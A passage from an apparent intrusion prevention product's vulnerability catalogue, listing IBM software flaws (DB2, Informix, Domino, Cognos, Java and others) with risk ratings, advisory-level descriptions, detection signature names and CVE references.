https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3677
MS09-071
http://technet.microsoft.com/security/bulletin/MS09-071
Back to top

IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write

About this vulnerability: A vulnerability in IBiz EBanking Integrator
Risk: High
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBiz EBanking Integrator
Type: Input Validation
Description: There is an arbitraty file write vulnerability in the IBiz EBanking ActiveX control when calling the WriteOFXDataFile method.
Situation: File-Text_IBiz-EBanking-Integrator-ActiveX-WriteOFXDataFile-Method-Arbitrary-File-Write
References:
CVE-2008-1725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1725
BID-28700
http://www.securityfocus.com/bid/28700
OSVDB-44393
http://www.osvdb.org/44393
Back to top

IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986

About this vulnerability: A vulnerability in IBM Aspera Faspex
Risk: High
First detected in: sgpkg-ips-1558-5242
Last changed: sgpkg-ips-1558-5242
Platform: Generic
Software: IBM Aspera Faspex
Type: Input Validation
Description: A remote code execution vulnerability has been reported in IBM Aspera Faspex.
Situation: File-Text_IBM-Aspera-Faspex-Remote-Code-Execution-CVE-2022-47986
References:
CVE-2022-47986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47986
Back to top

IBM-BigFix-Relay-Servers-Information-Disclosure

About this vulnerability: A vulnerability in IBM BigFix Relay Servers
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM BigFix
Type: Insecure Configuration
Description: A vulnerability in IBM BigFix Relay Servers which allows remote attackers to gather information about the target system due to the lack of user authentication.
Situation: HTTP_CSU-IBM-BigFix-Relay-Servers-Information-Disclosure
References:
CVE-2019-4061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4061
Back to top

IBM-Cognos-Buffer-Overflow

About this vulnerability: An IBM Cognos Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: IBM Cognos Express
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in IBM Cognos Express 5.9, in tm1admsd.exe that allows remote attackers to execute arbitrary code via crafted data.
Situation: Generic_CS-IBM-Cognos-Buffer-Overflow
References:
CVE-2012-0202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0202
BID-52847
http://www.securityfocus.com/bid/52847
OSVDB-80876
http://www.osvdb.org/80876
Back to top

IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution

About this vulnerability: A vulnerability in IBM Cognos Express
Risk: High
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: IBM Cognos Express
Type: Backdoor
Description: A code execution vulnerability exists in IBM Cognos Express. The vulnerability is due to hard-coded user credentials, with manager-level permissions, installed by default in the user configuration of the bundled Tomcat server. Remote unauthenticated attackers can exploit this vulnerability by using these credentials to connect to the vulnerable server over port 19300/TCP and deploy a malicious web application on a vulnerable system. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. In this case, the injected code will run with the privileges of the Tomcat server process. On Windows systems the Tomcat process runs as SYSTEM.
Situation: HTTP_CSH-IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution
References:
CVE-2010-0557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0557
BID-38084
http://www.securityfocus.com/bid/38084
OSVDB-62118
http://www.osvdb.org/62118
Back to top

IBM-Data-Risk-Manager-Authentication-Bypass

About this vulnerability: An attempt to exploit a vulnerability in IBM Data Risk Manager detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: IBM Data Risk Manager
Type: Malfunction
Description: An attempt to exploit a vulnerability in IBM Data Risk Manager detected.
Situation: HTTP_CSU-IBM-Data-Risk-Manager-Authentication-Bypass
References:
CVE-2020-4427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4427
Back to top

IBM-Data-Risk-Manager-Path-Traversal

About this vulnerability: An attempt to exploit a vulnerability in IBM Data Risk Manager detected
Risk: High
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: IBM Data Risk Manager
Type: Malfunction
Description: An attempt to exploit a vulnerability in IBM Data Risk Manager detected.
Situation: HTTP_CRL-IBM-Data-Risk-Manager-Path-Traversal
References:
CVE-2020-4430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4430
Back to top

IBM-Data-Risk-Manager-Unathenticated-RCE

About this vulnerability: A vulnerability in IBM Data Risk Manager.
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Linux
Software: IBM Data Risk Manager
Type: Input Validation
Description: A vulnerability in IBM Data Risk Manager, version 2.0.4 and before, which allows remote attackers to execute arbitrary code by uploading specially crafted files to albatross/upload/patch where commands are accepted and processed without validation.
Situation: HTTP_CS-IBM-Data-Risk-Manager-Unathenticated-RCE
References:
CVE-2020-4428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4428
Back to top

IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in IBM DB2
Risk: High
First detected in: sgpkg-ips-280-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: IBM DB2
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM DB2. A remote authenticated attacker can exploit this vulnerability by invoking the REPEAT function call with a malicious argument to cause a denial of service condition or to execute arbitrary code with the privileges of the affected service.
Situation: Generic_CS-IBM-DB2-Database-Server-SQL-REPEAT-Buffer-Overflow
References:
CVE-2010-0462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0462
BID-37976
http://www.securityfocus.com/bid/37976
OSVDB-62063
http://www.osvdb.org/62063
Back to top

IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability

About this vulnerability: IBM DB2 kuddb2 Remote Denial of Service Vulnerability.
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: IBM DB2
Type: Malfunction
Description: A ulnerability in IBM DB2 9.7 FP1 which allows remote attackers to cause a denial of service condition by sending a specific byte sequence.
Situation: X11_CS-IBM-DB2-kuddb2-Remote-Denial-of-Service-Vulnerability
References:
CVE-2010-0472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0472
BID-38018
http://www.securityfocus.com/bid/38018
Back to top

IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service

About this vulnerability: An IBM DB2 Universal Database Connection Handshake Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM DB2
Type: Malfunction
Description: A vulnerability in IBM DB2 Universal Database which allows remote attackers to create a denial of service condition by omitting the RDBNAM parameter from the first ACCSEC command during the connection establishment process.
Situation: Generic_CS-IBM-DB2-Universal-Database-Connection-Handshake-Denial-of-Service
References:
CVE-2006-4257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4257
Back to top

IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow

About this vulnerability: A vulnerability in IBM DB2
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM DB2
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in IBM DB2 Universal Database.
Situation: Generic_CS-IBM-DB2-Universal-Database-Receivedasmessage-Buffer-Overflow
References:
BID-46052
http://www.securityfocus.com/bid/46052
Back to top

IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow

About this vulnerability: A vulnerability in IBM DB2 Universal Database
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM DB2
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in IBM DB2 Universal Database application.
Situation: Generic_CS-IBM-DB2-Universal-Database-XML-Query-Buffer-Overflow
References:
CVE-2008-3854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3854
BID-29601
http://www.securityfocus.com/bid/29601
Back to top

IBM-Director-Agent-DOS

About this vulnerability: A vulnerability in IBM Director Agent
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Director Agent
Type: Buffer Overflow
Description: There is a vulnerability within IBM Director Agent. This is a tool released by IBM to monitor and control computer systems remotely. It is possible for a remote attacker to craft and send a packet that will cause the remote Agent to terminate leading to a denial of service condition. Upon receipt of a malformed request from an attacker, the director agent service will terminate on the target computer. An administrator will then be unable to connect to the remote agent through the IBM Director interface until the agent is restarted on the target computer.
Situation: Generic_CS-IBM-Director-Agent-DOS
Back to top

IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in IBM Systems Director
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: IBM Systems Director
Type: Input Validation
Description: A design weakness exists in the CIM Server of IBM Director.
Situation: HTTP_CSU-IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service
References:
CVE-2009-0879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0879
BID-34061
http://www.securityfocus.com/bid/34061
OSVDB-52615
http://www.osvdb.org/52615
Back to top

IBM-Domino-Gif-Processing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Domino
Risk: Moderate
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Domino
Type: Buffer Overflow
Description: An integer truncation vulnerability exists in IBM Lotus Domino Server. The vulnerability exists in the way that nrouter.exe component handles GIF files in emails. By sending a crafted email to a Domino server, a remote unauthenticated can possibly exploit this vulnerability to execute arbitrary code with System privileges on the target server.
Situation: File-GIF_IBM-Domino-Gif-Processing-Heap-Buffer-Overflow
References:
CVE-2015-0135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0135
Back to top

IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Domino
Risk: High
First detected in: sgpkg-ips-717-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Domino
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in IBM Domino. The vulnerability is due to improper bounds checking when parsing image files. This could potentially lead to an undersized buffer being allocated. A remote, unauthenticated attacker can exploit this vulnerability by sending an email containing a crafted image to the target server. A successful attack will result in the ability to execute arbitrary code with System privileges on the target server.
Situation: File-Binary_IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow
References:
CVE-2015-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5040
Back to top

IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Domino
Risk: Moderate
First detected in: sgpkg-ips-925-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Domino
Type: Buffer Overflow
Description: Improper processing of command arguments with several IMAP commands causes a stack buffer overflow vulnerability in IBM Domino. A successful exploitation allows an attacker to run arbitrary code with system privileges.
Situation: IMAP_IBM-Domino-IMAP-Mailbox-Name-Stack-Buffer-Overflow
References:
CVE-2017-1274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1274
Back to top

IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Domino
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Domino
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exist in IBM Domino's LDAP Server. The vulnerability is due to insufficient validation of input leading to copying an indefinite amount of data from a crafted ModifyRequest LDAP message to a fixed length stack buffer. A remote, unauthenticated attacker can exploit this vulnerability to cause a buffer overflow. Successful exploitation will result in the execution of arbitrary code with SYSTEM privileges. An unsuccessful attack could result in a denial of service condition of the affected service.
Situation: LDAP_CS-IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow
References:
CVE-2015-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0117
Back to top

IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Forms Viewer
Risk: Moderate
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Forms Viewer
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in IBM Forms Viewer. The vulnerability is due to an error when processing XFDL forms and can be exploited to cause a stack-based buffer overflow. A remote unauthenticated attacker can exploit the vulnerability by enticing a user to open a specifically crafted form. Successful exploitation of the vulnerability would result in the execution of arbitrary code within the security context of the currently logged on user.
Situation: File-TextId_IBM-Forms-Viewer-Xfdl-Form-Processing-Stack-Buffer-Overflow
References:
CVE-2013-5447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5447
OSVDB-100732
http://www.osvdb.org/100732
Back to top

IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Informix Client SDK
Risk: High
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Client SDK; IBM Informix Connect
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in IBM Informix Client SDK. The vulnerability is due to insufficient input validation while parsing ".nfx" files, and may lead to code execution in the context of the current user.
Situation: HTTP_SS-IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
File-TextId_IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
Back to top

IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in IBM Informix Dynamic Server. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Bts_tracefile-Directory-Traversal
Back to top

IBM-Informix-Dynamic-Server-Command-Argument-Processing-Stack-Overflow

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in IBM Informix Dynamic Server. The vulnerability is due to a boundary error when processing a large number of arguments passed in the Authentication messages. Remote unauthenticated attackers may exploit the vulnerability to cause denial of service or inject and execute arbitrary code on the target system with System privileges. In a sophisticated attack scenario where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally System. In an attack case where code injection is not successful, the affected server will terminate and reset all established connections.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Command-Argument-Processing-BOF
References:
CVE-2008-0727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0727
BID-28198
http://www.securityfocus.com/bid/28198
Back to top

IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: A stack buffer overflow exists in IBM Informix Dynamic Server Database. The vulnerability is caused by insufficient bounds checking on user-supplied data provided to the DBINFO function as part of an SQL query. Successful exploitation of this vulnerability requires permission to execute SQL queries on a vulnerable server. An attacker could overflow the stack buffer allowing execution of arbitrary code with the privileges of the affected service, whereas an unsuccessful exploitation attempt may result in a denial of service for the database.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Dbinfo-Stack-Buffer-Overflow
References:
CVE-2010-4069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4069
BID-44190
http://www.securityfocus.com/bid/44190
OSVDB-68707
http://www.osvdb.org/68707
Back to top

IBM-Informix-Dynamic-Server-Librpc.dll-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: Multiple buffer overflow vulnerabilities has been reported in IBM's Informix Dynamic Server. The vulnerabilities are due to insufficient validation of user inputs during authentication by the RPC protocol parsing library, librpc.dll. This library is used by the Portmapper service (portmap.exe) which runs on port TCP/36890. A remote attacker could exploit the vulnerability by sending malicious RPC packets to the target server. Successful exploitation would cause heap and stack based buffer overflows which can lead to arbitrary code execution in the context of the affected service, which is SYSTEM.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow
Generic_UDP-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow
References:
CVE-2009-2753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2753
BID-38471
http://www.securityfocus.com/bid/38471
Back to top

IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in certain versions of the IBM Informix Dynamic Server (IDS)
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: Certain versions of the IBM Informix Dynamic Server suffer from a vulnerability where a long username in a login packet will cause a buffer overflow. The buffer overflow can be used by remote attackers to execute arbitrary code on a vulnerable host.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Buffer-Overflow
References:
CVE-2006-3853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3853
BID-19264
http://www.securityfocus.com/bid/19264
OSVDB-27685
http://www.osvdb.org/27685
Back to top

IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in certain versions of the IBM Informix Dynamic Server (IDS)
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: Certain versions of the IBM Informix Dynamic Server suffer from a vulnerability where a long username in a login packet will cause a buffer overflow. This issue is a vulnerability in the fix for CVE-2006-3853, resulting from the incorrect use of buffers while printing an error message. The buffer overflow can be used by remote attackers to execute arbitrary code on a vulnerable host.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Long-Username-Vsprintf-Buffer-Overflow
References:
CVE-2006-3854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3854
Back to top

IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: A stack buffer overflow exists in IBM Informix Dynamic Server Database.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Oninit.exe-Explain-Stack-Buffer-Overflow
References:
CVE-2010-4053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4053
BID-44192
http://www.securityfocus.com/bid/44192
OSVDB-68705
http://www.osvdb.org/68705
Back to top

IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in IBM Informix Dynamic Server.
Situation: Generic_CS-IBM-Informix-Dynamic-Server-Set-Environment-Stack-Buffer-Overflow
References:
CVE-2011-1033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1033
BID-46230
http://www.securityfocus.com/bid/46230
Back to top

IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow

About this vulnerability: AN IBM Informix Dynamic Server testconn Heap Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability in IBM Informix Dynamic Server, and Informix Open Admin Tool, which allows remote attackers to execute remote code, due to an input validation error with requests sent to index.php.
Situation: HTTP_CRL-IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow
References:
CVE-2017-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1092
Back to top

IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution

About this vulnerability: A vulnerability in IBM Informix Dynamic Server
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Informix Dynamic Server
Type: Input Validation
Description: There has been reported a vulnerability in IBM Informix OpenAdmin Tool. User-supplied input isn't parsed properly on the SOAP interface. This vulnerability can be exploited by sending a crafted HTTP request to the target server.
Situation: HTTP_CRL-IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution
References:
CVE-2017-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1092
Back to top

IBM-iNotes-ActiveX-Control-Integer-Overflow

About this vulnerability: A vulnerability in IBM iNotes
Risk: Moderate
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Lotus iNotes; Lotus Domino
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in IBM iNotes. The vulnerability is due to an integer overflow within an ActiveX control. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.
Situation: File-Text_IBM-iNotes-ActiveX-Control-Integer-Overflow
References:
CVE-2013-3027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3027
OSVDB-95993
http://www.osvdb.org/95993
Back to top

IBM-Installation-Manager-IIM-URI-Handling-Code-Execution

About this vulnerability: A vulnerability in IBM Installation Manager
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Installation Manager; IBM Rational Robot; IBM Rational Team Concert Standard Edition
Type: Input Validation
Description: There is an argument injection vulnerability in IBM Installation Manager. The vulnerability is due to insufficient checks when parsing iim:// URIs that could allow execution of arbitrary remote programs. A remote attacker can exploit this vulnerability by enticing the target user to open an HTML file that contains a crafted iim:// URI, which could lead to execution of arbitrary programs on the target.
Situation: HTTP_SS-IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
File-Text_IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
References:
BID-36549
http://www.securityfocus.com/bid/36549
Back to top

IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach

About this vulnerability: A vulnerability in IBM Java
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Java
Type: Malfunction
Description: There exists a sandbox breach vulnerability in IBM Java. A remote, unauthenticated attacker can use this to execute arbitrary Java code outside the sandbox.
Situation: File-Binary_IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach
References:
CVE-2012-4820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4820
OSVDB-87300
http://www.osvdb.org/87300
Back to top

IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach

About this vulnerability: A vulnerability in IBM Java
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Java
Type: Malfunction
Description: A sandbox breach vulnerability exists in IBM Java. The vulnerability is due to insecure use of the java.lang.ClassLoader.defineClass method by IBM Java packages. An unauthenticated remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation can result in the execution of arbitrary Java code outside the sandbox.
Situation: File-Binary_IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach
References:
CVE-2012-4823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4823
BID-55495
http://www.securityfocus.com/bid/55495
OSVDB-87301
http://www.osvdb.org/87301
Back to top

IBM-Java-Multiple-Packages-Sandbox-Breach

About this vulnerability: A vulnerability in IBM Java
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Java
Type: Malfunction
Description: A sandbox breach vulnerability exists in IBM Java. The vulnerability is due to insecure use of certain methods in java.lang.class by IBM Java packages. An unauthenticated remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation can result in the execution of arbitrary Java code outside the sandbox.
Situation: File-Binary_IBM-Java-Multiple-Packages-Sandbox-Breach
References:
CVE-2012-4822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4822
BID-55495
http://www.securityfocus.com/bid/55495
OSVDB-87302
http://www.osvdb.org/87302
Back to top

IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Domino
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Domino; IBM Notes And Domino
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in IBM Lotus Domino. The vulnerability is due to improper bounds checking while parsing a BMP image with an overly large color palette. By sending a crafted email to a Domino server, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code with System privileges on the target server.
Situation: File-Binary_IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow
References:
CVE-2015-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1903
Back to top

IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in IBM Domino
Risk: High
First detected in: sgpkg-ips-675-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IBM Domino; IBM Lotus Notes
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in IBM Lotus Domino. The vulnerability is due to improper bounds checking when parsing a BMP image with crafted dimensions. This could potentially lead to an undersized buffer being allocated. A remote, unauthenticated attacker can exploit this vulnerability by sending an email containing a crafted BMP image to the target server. A successful attack could possibly result in the ability to execute arbitrary code with System privileges on the target server.
Situation: File-Binary_IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow
References:
CVE-2015-1902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1902
Back to top

IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Lotus Domino
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Domino
Type: Input Validation
Description: A stack buffer overflow has been reported in IBM Lotus Domino. The vulnerability exists in the WebAdmin.nsf module, when variables from an HTTP POST request are copied to a stack buffer without prior validation.
Situation: HTTP_CRL-IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow
Back to top

IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Domino
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way IBM Lotus Domino IMAP Server handles LSUB requests. The vulnerability is due to lack of boundary protection while processing the subscribed mailbox names. A remote authenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System.
Situation: IMAP_CS-IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow
References:
CVE-2007-3510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3510
BID-26219
http://www.securityfocus.com/bid/26219
Back to top

IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Domino
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Lotus Domino
Type: Integer Overflow
Description: An integer overflow vulnerability exists in IBM Lotus Domino's LDAP service.
Situation: LDAP_CS-IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow
References:
CVE-2011-0917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0917
BID-46231
http://www.securityfocus.com/bid/46231
Back to top

IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Domino
Risk: High
First detected in: sgpkg-ips-287-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Domino
Type: Integer Overflow
Description: There is a heap buffer overflow in IBM Lotus Domino Server. The vulnerability is due to an integer overflow that can occur when processing LDAP messages. A remote unauthenticated attacker could leverage this vulnerability by sending a crafted LDAP message to the target server. Successful exploitation could lead to the execution of arbitrary code on the target server in the security context of the affected service.
Situation: LDAP_CS-IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow
References:
CVE-2010-0358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0358
Back to top

IBM-Lotus-Domino-LDAP-Server-Memory-Exception

